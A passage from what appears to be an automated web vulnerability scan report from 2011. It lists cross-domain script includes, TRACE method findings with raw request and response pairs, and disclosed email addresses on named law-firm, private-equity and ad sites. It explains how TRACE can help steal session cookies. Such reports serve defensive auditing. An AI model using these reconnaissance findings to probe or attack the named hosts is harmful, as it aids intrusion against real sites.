Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html?action=attorneyDetail&attorneyID=15
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.6.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 7957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.42. http://www.privateequityinfo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=eq1oat81k7im20tchffed7ii03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25258

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Firms, Hedge Funds, Mezzanine Investors, Small Business Investment Companies (SBIC), Valuation Fi
...[SNIP]...
</script>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.43. http://www.privateequityinfo.com/forgotpassword.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /forgotpassword.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forgotpassword.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/product_details.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=222922074

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 21431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Info - Forgot Your Password?</title>
<meta name="description" content="Database of private equit
...[SNIP]...
</script>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.44. http://www.privateequityinfo.com/product_details.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /product_details.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /product_details.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 58851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Product details</title>
<meta name="description" content="Database of Private Equity Firms, Hedge Funds, Mezzan
...[SNIP]...
</script>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.45. http://www.providenceequitypartners.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.providenceequitypartners.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.providenceequitypartners.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASAQTRCB=CAMHPCLDELCDGHFEIMOCJHMO; path=/
Cache-control: private


<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<link rel="shortcut icon" href="http://www.provequity.com/favicon.ico" />
   <script type="text/javascript" src="http://www.provequity.com/swfobject.js"></script>
...[SNIP]...

20.46. http://www.soundpatheview.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundpatheview.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.soundpatheview.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:02 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title
...[SNIP]...
</script>
   <script src="http://www.conferenceservers.com/browser/proxy.asp" type="text/javascript"></script>
...[SNIP]...

20.47. http://www.vcgate.com/Private-Equity.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /Private-Equity.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Private-Equity.htm HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-type: text/html
Content-Length: 13102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Google Website Op
...[SNIP]...
<!-- End of Google Website Optimizer Control Script -->


<script language="javascript" SRC="http://www.affiliaterunner.com/Merchant/JScripts/Redirect.js">
       </script>
...[SNIP]...

20.48. http://www.vcgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28331451.1305198197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx=28331451.; __utmxx=28331451.; __utma=28331451.1717277298.1305198197.1305198197.1305198197.1; __utmc=28331451; __utmb=28331451.4.10.1305198197

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<meta name="generator" content="WordPress 2.7.1" />

<script language="javascript" SRC="http://www.affiliaterunner.com/Merchant/JScripts/Redirect.js">
</script>
...[SNIP]...

20.49. http://www.vcprodatabase.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcprodatabase.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.vcprodatabase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 22208
Content-Type: text/html
Content-Location: http://www.vcprodatabase.com/index.htm
Last-Modified: Fri, 15 Apr 2011 02:22:54 GMT
Accept-Ranges: bytes
ETag: "5ebc26714fbcb1:5897"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:02:25 GMT

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="Description" content="VCPro Database is a downloadable venture capital and private equity dire
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d7f64ca6906e72b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d7f64ca6906e72b"></script>
...[SNIP]...

20.50. http://www.vcprodatabase.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcprodatabase.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcprodatabase.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 8251
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:02:32 GMT

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="robots" content="noindex, nofollow">
<link REL="stylesheet" TYPE="text/css" HREF="../style/co
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d7f64ca6906e72b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d7f64ca6906e72b"></script>
...[SNIP]...

21. TRACE method is enabled
There are 13 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


21.1. http://convctr.overture.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://convctr.overture.com
Path:   /

Request

TRACE / HTTP/1.0
Host: convctr.overture.com
Cookie: c81679cb27cd65ce

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:25 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: c81679cb27cd65ce
Host: convctr.overture.com


21.2. http://investmentfirmsdirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investmentfirmsdirect.com
Path:   /

Request

TRACE / HTTP/1.0
Host: investmentfirmsdirect.com
Cookie: 5e4c3aa7b3557395

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:30 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: investmentfirmsdirect.com
Cookie: 5e4c3aa7b3557395


21.3. http://media.ft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.ft.com
Path:   /

Request

TRACE / HTTP/1.0
Host: media.ft.com
Cookie: 8f98f54ca90f3353

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Thu, 12 May 2011 11:03:18 GMT
Content-Type: message/http
Content-Length: 99
Expires: Thu, 12 May 2011 11:03:18 GMT
Connection: close

TRACE / HTTP/1.0
Host: media.ft.com
Cookie: 8f98f54ca90f3353
_FP_X_URL: http://media.ft.com/


21.4. http://secure-us.imrworldwide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: d2df793dedba7a7d

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d2df793dedba7a7d
Host: secure-us.imrworldwide.com


21.5. http://stats.ft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.ft.com
Path:   /

Request

TRACE / HTTP/1.0
Host: stats.ft.com
Cookie: 3bd0b215e2ccac8

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:34 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: stats.ft.com
Cookie: 3bd0b215e2ccac8


21.6. http://webezines.kwithost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webezines.kwithost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: webezines.kwithost.com
Cookie: c41bd4f931f805a8

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Apache/2.2.16 (Amazon)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: webezines.kwithost.com
Cookie: c41bd4f931f805a8


21.7. http://www.bergerkahn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bergerkahn.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bergerkahn.com
Cookie: 197885c4921638c0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bergerkahn.com
Cookie: 197885c4921638c0


21.8. http://www.butlerrubin.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.butlerrubin.com
Cookie: 8182bb866165f2b

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:18 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 12 May 2011 12:21:18 GMT
Content-Type: message/http
Content-Length: 70

TRACE / HTTP/1.0
Host: www.butlerrubin.com
Cookie: 8182bb866165f2b

21.9. http://www.dmoc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmoc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dmoc.com
Cookie: 71fffb2bce45600f

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dmoc.com
Cookie: 71fffb2bce45600f


21.10. http://www.hbsr.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hbsr.com
Cookie: bc55d55072b1fa4a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:28 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hbsr.com
Cookie: bc55d55072b1fa4a


21.11. http://www.opalgroup.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opalgroup.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.opalgroup.net
Cookie: 1ff9e3319e03cdd

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:01:14 GMT
Server: Apache/2.2.6 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.opalgroup.net
Cookie: 1ff9e3319e03cdd


21.12. http://www.privateequityinfo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.privateequityinfo.com
Cookie: be16e65b9cb86c03

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.privateequityinfo.com
Cookie: be16e65b9cb86c03


21.13. http://www.tuckerellis.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuckerellis.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tuckerellis.com
Cookie: d537795292ad6dbf

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:41 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tuckerellis.com
Cookie: d537795292ad6dbf


22. Email addresses disclosed
There are 89 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


22.1. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYoNJIo0ZD9h4gSR2t6eX%2Bx%2FvwBCsGtyeY2n2TujHgBvTG%2BOKQ4qYoHHIwCcAEMBdNBHdKy17BavWQ9ZY77OrEDINIg1XDOObQOMHgCjJhYvvPUetd3CRKpcfmSZlq5gkiP6%2BTF%2B9H%2BYUa1jLmSW036QqX1%2BmfKP6Ns3zY8yzQBi7s3J7OHh4jvaxE5RmaKbXB4kqguFLGpV9pfqzKR2k0rtnngbgUsbdqym9abDOQa21stM%2BZ904IVzmE7JGYsst5yCLj41ykxWGUwv5bBOElWhM5XZAX9%2FMFIAF1JUSrh%2FiP4PV6Aw%3D%3D"; 
vsd=0@1@4dcaa3a0@d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 11:39:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjNt9jGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:39:41 GMT
Set-Cookie: ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:39:41 GMT
Set-Cookie: vsd=0@1@4dcbc6fd@cdn.turn.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 11:39:41 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

22.2. http://ads.foxnews.com/js/omtr_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.foxnews.com
Path:   /js/omtr_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/omtr_code.js HTTP/1.1
Host: ads.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
